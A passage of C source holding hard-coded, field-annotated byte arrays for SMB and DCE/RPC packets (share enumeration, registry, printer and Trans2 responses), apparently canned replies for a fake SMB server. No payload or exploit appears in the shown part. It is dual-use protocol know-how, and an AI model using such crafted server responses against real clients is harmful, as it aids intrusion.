Negotiate ERROR Response\n\n\"\\x00\\x00\\x01\\x1b\"\n\n\"\\xff\\x53\\x4d\\x42\\x73\\x16\\x00\\x00\\xc0\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x04\\xff\\x00\\x1b\\x01\\x00\\x00\\xa6\\x00\\xf0\\x00\\x4e\\x54\\x4c\\x4d\\x53\"\n\n\"\\x53\\x50\\x00\\x02\\x00\\x00\\x00\\x12\\x00\\x12\\x00\\x30\\x00\\x00\\x00\\x15\"\n\n\"\\x82\\x8a\\xe0\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // NTLM Challenge\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x64\\x00\\x64\\x00\\x42\\x00\\x00\\x00\"\n\n\"\\x53\\x00\\x45\\x00\\x52\\x00\\x56\\x00\\x49\\x00\\x43\\x00\\x45\\x00\\x50\\x00\"\n\n\"\\x43\\x00\\x02\\x00\\x12\\x00\\x53\\x00\\x45\\x00\\x52\\x00\\x56\\x00\\x49\\x00\"\n\n\"\\x43\\x00\\x45\\x00\\x50\\x00\\x43\\x00\\x01\\x00\\x12\\x00\\x53\\x00\\x45\\x00\"\n\n\"\\x52\\x00\\x56\\x00\\x49\\x00\\x43\\x00\\x45\\x00\\x50\\x00\\x43\\x00\\x04\\x00\"\n\n\"\\x12\\x00\\x73\\x00\\x65\\x00\\x72\\x00\\x76\\x00\\x69\\x00\\x63\\x00\\x65\\x00\"\n\n\"\\x70\\x00\\x63\\x00\\x03\\x00\\x12\\x00\\x73\\x00\\x65\\x00\\x72\\x00\\x76\\x00\"\n\n\"\\x69\\x00\\x63\\x00\\x65\\x00\\x70\\x00\\x63\\x00\\x06\\x00\\x04\\x00\\x01\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\"\n\n\"\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x35\\x00\\x2e\\x00\\x31\\x00\\x00\\x00\\x57\"\n\n\"\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\"\n\n\"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x4c\\x00\\x41\\x00\\x4e\\x00\\x20\"\n\n\"\\x00\\x4d\\x00\\x61\\x00\\x6e\\x00\\x61\\x00\\x67\\x00\\x65\\x00\\x72\\x00\\x00\";\n\n\n\nunsigned char SessionSetupAndXAuth[] =\n\n\"\\x00\\x00\\x00\\x75\"\n\n\"\\xff\\x53\\x4d\\x42\\x73\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x04\\xff\\x00\\x75\\x00\\x01\\x00\\x00\\x00\\x4a\\x00\\x4e\\x57\\x00\\x69\\x00\"\n\n\"\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x35\\x00\\x2e\\x00\"\n\n\"\\x31\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\"\n\n\"\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x4c\\x00\"\n\n\"\\x41\\x00\\x4e\\x00\\x20\\x00\\x4d\\x00\\x61\\x00\\x6e\\x00\\x61\\x00\\x67\\x00\"\n\n\"\\x65\\x00\\x72\\x00\\x00\";\n\n\n\nunsigned char TreeConnectAndX[] =\n\n\"\\x00\\x00\\x00\\x38\"\n\n\"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x07\\xff\\x00\\x38\\x00\\x01\\x00\\xff\\x01\\x00\\x00\\xff\\x01\\x00\\x00\\x07\"\n\n\"\\x00\\x49\\x50\\x43\\x00\\x00\\x00\\x00\";\n\n\n\nunsigned char SmbNtCreate [] =\n\n\"\\x00\\x00\\x00\\x87\"\n\n\"\\xff\\x53\\x4d\\x42\"                 // SMB\n\n\"\\xa2\"                             // SMB Command: NT Create AndX (0xa2)\n\n\"\\x00\\x00\\x00\\x00\"                 // NT Status: STATUS_SUCCESS (0x00000000)\n\n\"\\x98\"                             // Flags: 0x98\n\n\"\\x07\\xc8\"                         // Flags2 : 0xc807\n\n\"\\x00\\x00\"                         // Process ID High: 0\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Signature: 0000000000000000\n\n\"\\x00\\x00\"                         // Reserved: 0000\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // User ID: 0\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x2a\"                             // Word Count (WCT): 42\n\n\"\\xff\"                             // AndXCommand: No further commands (0xff)\n\n\"\\x00\"                             // Reserved: 00\n\n\"\\x87\\x00\"                         // AndXOffset: 135\n\n\"\\x00\"                             // Oplock level: No oplock granted (0)\n\n\"\\x00\\x00\"                         // FID: 0\n\n\"\\x01\\x00\\x00\\x00\"                 // Create action: The file existed and was opened (1)\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Created: No time specified (0)\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Last Access: No time specified (0)\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Last Write: No time specified (0)\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Change: No time specified (0)\n\n\"\\x80\\x00\\x00\\x00\"                 // File Attributes: 0x00000080\n\n\"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\" // Allocation Size: 4096\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // End Of File: 0\n\n\"\\x02\\x00\"                         // File Type: Named pipe in message mode (2)\n\n\"\\xff\\x05\"                         // IPC State: 0x05ff\n\n\"\\x00\"                             // Is Directory: This is NOT a directory (0)\n\n\"\\x00\\x00\"                         // Byte Count (BCC): 0\n\n\n\n// crap\n\n\"\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x74\\x7a\\x4f\\xac\\x2d\\xdf\\xd9\"\n\n\"\\x11\\xb9\\x20\\x00\\x10\\xdc\\x9b\\x01\"\n\n\"\\x12\\x00\\x9b\\x01\\x12\\x00\\x1b\\xc2\";\n\n\n\nunsigned char DceRpc[] =\n\n\"\\x00\\x00\\x00\\x7c\"\n\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x0a\\x00\\x00\\x44\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x44\\x00\\x38\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x45\\x00\\x00\\x05\\x00\\x0c\\x03\\x10\\x00\\x00\\x00\"\n\n\"\\x44\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb8\\x10\\xb8\\x10\"\n\n\"\\x00\\x00\\x00\\x00\"                 // Assoc Group\n\n\"\\x0d\\x00\\x5c\\x50\\x49\\x50\\x45\\x5c\"\n\n\"\\x00\\x00\\x00\"                     // srv or wks\n\n\"\\x73\\x76\\x63\\x00\\xff\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x5d\\x88\"\n\n\"\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\"\n\n\"\\x00\";\n\n\n\nunsigned char WksSvc[] =\n\n\"\\x00\\x00\\x00\\xb0\"\n\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x0a\\x00\\x00\\x78\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x78\\x00\\x38\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x79\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\n\"\\x78\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x60\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x64\\x00\\x00\\x00\\xb8\\x0f\\x16\\x00\\xf4\\x01\\x00\\x00\\xe6\\x0f\\x16\\x00\"\n\n\"\\xd2\\x0f\\x16\\x00\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\\x53\\x00\\x45\\x00\\x52\\x00\\x56\\x00\"\n\n\"\\x49\\x00\\x43\\x00\\x45\\x00\\x50\\x00\\x43\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\\x57\\x00\\x4f\\x00\\x52\\x00\\x4b\\x00\"\n\n\"\\x47\\x00\\x52\\x00\\x4f\\x00\\x55\\x00\\x50\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\n\n\n\nunsigned char SrvSvc[] =\n\n\"\\x00\\x00\\x00\\xac\"\n\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x0a\\x00\\x00\\x74\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x74\\x00\\x38\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x75\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\n\"\\x74\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x5c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x65\\x00\\x00\\x00\\x68\\x3d\\x14\\x00\\xf4\\x01\\x00\\x00\"\n\n\"\\x80\\x3d\\x14\\x00\"                                                 // Server IP\n\n\"\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x03\\x10\\x05\\x00\\x9c\\x3d\\x14\\x00\"\n\n\"\\x0e\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\\x00\\x00\"\n\n\"\\x31\\x00\\x39\\x00\\x32\\x00\\x2e\\x00\\x31\\x00\\x36\\x00\\x38\\x00\\x2e\\x00\" // Server IP ( UNICODE )\n\n\"\\x32\\x00\\x2e\\x00\\x31\\x00\\x30\\x00\\x33\\x00\\x00\\x00\"\n\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x55\\x00\"\n\n\"\\x00\\x00\\x00\\x00\";\n\n\n\nunsigned char SmbClose[] =\n\n\"\\x00\\x00\\x00\\x23\"\n\n\"\\xff\\x53\\x4d\\x42\"                 // SMB\n\n\"\\x04\"                             // SMB Command: Close (0x04)\n\n\"\\x00\\x00\\x00\\x00\"                 // NT Status: STATUS_SUCCESS (0x00000000)\n\n\"\\x98\"                             // Flags: 0x98\n\n\"\\x07\\xc8\"                         // Flags2 : 0xc807\n\n\"\\x00\\x00\"                         // Process ID High: 0\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Signature: 0000000000000000\n\n\"\\x00\\x00\"                         // Reserved: 0000\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x00\"                             // Word Count (WCT): 0\n\n\"\\x00\\x00\";                        // Byte Count (BCC): 0\n\n\n\nunsigned char NetrShareEnum[] =\n\n\"\\x00\\x00\\x01\\x90\"\n\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x0a\\x00\\x00\\x58\\x01\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x58\\x01\\x38\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x59\\x01\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\n\"\\x58\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x01\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x54\\x0a\\x17\\x00\\x04\\x00\\x00\\x00\"\n\n\"\\xa0\\x28\\x16\\x00\\x04\\x00\\x00\\x00\\x80\\x48\\x16\\x00\\x03\\x00\\x00\\x80\"\n\n\"\\x8a\\x48\\x16\\x00\\x6e\\x48\\x16\\x00\\x00\\x00\\x00\\x00\\x7e\\x48\\x16\\x00\"\n\n\"\\x48\\x48\\x16\\x00\\x00\\x00\\x00\\x80\\x56\\x48\\x16\\x00\\x20\\x48\\x16\\x00\"\n\n\"\\x00\\x00\\x00\\x80\\x26\\x48\\x16\\x00\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x05\\x00\\x00\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\\x36\\x00\"\n\n\"\\x0b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x52\\x00\\x65\\x00\"\n\n\"\\x6d\\x00\\x6f\\x00\\x74\\x00\\x65\\x00\\x2d\\x00\\x49\\x00\\x50\\x00\\x43\\x00\"\n\n\"\\x00\\x00\\x37\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\"\n\n\"\\x6e\\x00\\x65\\x00\\x74\\x00\\x62\\x00\\x69\\x00\\x6f\\x00\\x73\\x00\\x00\\x00\"\n\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x41\\x00\\x44\\x00\"\n\n\"\\x4d\\x00\\x49\\x00\\x4e\\x00\\x24\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x52\\x00\\x65\\x00\\x6d\\x00\\x6f\\x00\"\n\n\"\\x74\\x00\\x65\\x00\\x61\\x00\\x64\\x00\\x6d\\x00\\x69\\x00\\x6e\\x00\\x00\\x00\"\n\n\"\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x43\\x00\\x24\\x00\"\n\n\"\\x00\\x00\\x39\\x00\\x11\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00\"\n\n\"\\x53\\x00\\x74\\x00\\x61\\x00\\x6e\\x00\\x64\\x00\\x61\\x00\\x72\\x00\\x64\\x00\"\n\n\"\\x66\\x00\\x72\\x00\\x65\\x00\\x69\\x00\\x67\\x00\\x61\\x00\\x62\\x00\\x65\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\n\n\n\nunsigned char OpenPrinterEx[] =\n\n\"\\x00\\x00\\x00\\x68\"\n\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\n\"\\x30\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x24\\xd7\\x9c\\xf8\\xbb\\xe1\\xd9\\x11\\xb9\\x29\\x00\\x10\"\n\n\"\\xdc\\x4a\\x6b\\xbb\\x00\\x00\\x00\\x00\";\n\n\n\nunsigned char ClosePrinter[] =\n\n\"\\x00\\x00\\x00\\x68\"\n\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\n\"\\x30\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\n\n\n\nunsigned char OpenHklm[] =\n\n\"\\x00\\x00\\x00\\x68\"\n\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\n\"\\x30\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x4e\\x4c\\xb2\\xf8\\xbb\\xe1\\xd9\\x11\\xb9\\x29\\x00\\x10\"\n\n\"\\xdc\\x4a\\x6b\\xbb\\x00\\x00\\x00\\x00\";\n\n\n\nunsigned char OpenKey[] =\n\n\"\\x00\\x00\\x00\\x68\"\n\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\n\"\\x30\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\";\n\n\n\nunsigned char CloseKey[] =\n\n\"\\x00\\x00\\x00\\x68\"\n\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x0a\\x00\\x00\\x30\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x30\\x00\\x38\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x31\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\n\"\\x30\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\n\n\n\nunsigned char NetBios1[] =\n\n\"\\x00\\x00\\x00\\x94\"\n\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x0a\\x00\\x00\\x5c\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x5c\\x00\\x38\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x5d\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\n\"\\x5c\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x44\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x01\\x00\\x00\\x00\\xc0\\xa2\\x16\\x00\\xae\\xc2\\x16\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\xbe\\xc2\\x16\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\"\n\n\"\\x6e\\x00\\x65\\x00\\x74\\x00\\x62\\x00\\x69\\x00\\x6f\\x00\\x73\\x00\\x00\\x00\"\n\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x2e\\x00\"\n\n\"\\x00\\x00\\x00\\x00\";\n\n\n\nunsigned char NetBios2[] =\n\n\"\\x00\\x00\\x00\\x3e\"\n\n\"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x07\\xff\\x00\\x3e\\x00\\x01\\x00\\xff\\x01\\x00\\x00\\xff\\x01\\x00\\x00\\x0d\"\n\n\"\\x00\\x41\\x3a\\x00\\x4e\\x00\\x54\\x00\\x46\\x00\\x53\\x00\\x00\\x00\";\n\n\n\n// Trans2 Response, QUERY_PATH_INFO\n\nunsigned char Trans2Response1[] =\n\n\"\\x00\\x00\\x00\\x64\"\n\n\"\\xff\\x53\\x4d\\x42\"                 // SMB\n\n\"\\x32\"                             // SMB Command: Trans2 (0x32)\n\n\"\\x00\\x00\\x00\\x00\"                 // NT Status: STATUS_SUCCESS (0x00000000)\n\n\"\\x98\"                             // Flags: 0x98\n\n\"\\x07\\xc8\"                         // Flags2 : 0xc807\n\n\"\\x00\\x00\"                         // Process ID High: 0\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Signature: 0000000000000000\n\n\"\\x00\\x00\"                         // Reserved: 0000\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x0a\"                             // Word Count (WCT): 10\n\n\"\\x02\\x00\"                         // Total Parameter Count: 2\n\n\"\\x28\\x00\"                         // Total Data Count: 40\n\n\"\\x00\\x00\"                         // Reserved: 0000\n\n\"\\x02\\x00\"                         // Parameter Count: 2\n\n\"\\x38\\x00\"                         // Parameter Offset: 56\n\n\"\\x00\\x00\"                         // Parameter Displacement: 0\n\n\"\\x28\\x00\"                         // Data Count: 40\n\n\"\\x3c\\x00\"                         // Data Offset: 60\n\n\"\\x00\\x00\"                         // Data Displacement: 0\n\n\"\\x00\"                             // Setup Count: 0\n\n\"\\x00\"                             // Reserved: 00\n\n\"\\x2d\\x00\"                         // Byte Count (BCC): 45\n\n\"\\x00\"                             // Padding: 00\n\n\"\\x00\\x00\"                         // EA Error offset: 0\n\n\"\\x00\\x01\"                         // Padding: 0001\n\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Created: Jun 17, 2005 05:39:19.686500000\n\n\"\\x8c\\x24\\xba\\x5c\\x3a\\x73\\xc5\\x01\" // Last Access: Jun 17, 2005 05:44:55.092750000\n\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Last Write: Jun 17, 2005 05:39:19.686500000\n\n\"\\x9c\\x81\\x67\\x98\\x39\\x73\\xc5\\x01\" // Change:  Jun 17, 2005 05:39:25.717750000\n\n\"\\x10\\x00\\x00\\x00\"                 // File Attributes: 0x00000010\n\n\"\\x00\\x00\\x00\\x00\";                // Unknown Data: 00000000\n\n\n\n// Trans2 Response, QUERY_PATH_INFO\n\nunsigned char Trans2Response2[] = // ERROR Response\n\n\"\\x00\\x00\\x00\\x23\"\n\n\"\\xff\\x53\\x4d\\x42\\x32\\x34\\x00\\x00\\xc0\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x00\\x00\\x00\";\n\n\n\n// Trans2 Response, FIND_FIRST2, Files: . ..\n\nunsigned char Trans2Response3[] =\n\n\"\\x00\\x00\\x01\\x0c\"\n\n\"\\xff\\x53\\x4d\\x42\"                 // SMB\n\n\"\\x32\"                             // SMB Command: Trans2 (0x32)\n\n\"\\x00\\x00\\x00\\x00\"                 // NT Status: STATUS_SUCCESS (0x00000000)\n\n\"\\x98\"                             // Flags: 0x98\n\n\"\\x07\\xc8\"                         // Flags2 : 0xc807\n\n\"\\x00\\x00\"                         // Process ID High: 0\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Signature: 0000000000000000\n\n\"\\x00\\x00\"                         // Reserved: 0000\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\x00\\x00\"                         // Process ID: 0\n\n\"\\x00\\x00\"                         // USER ID\n\n\"\\x00\\x00\"                         // Multiplex 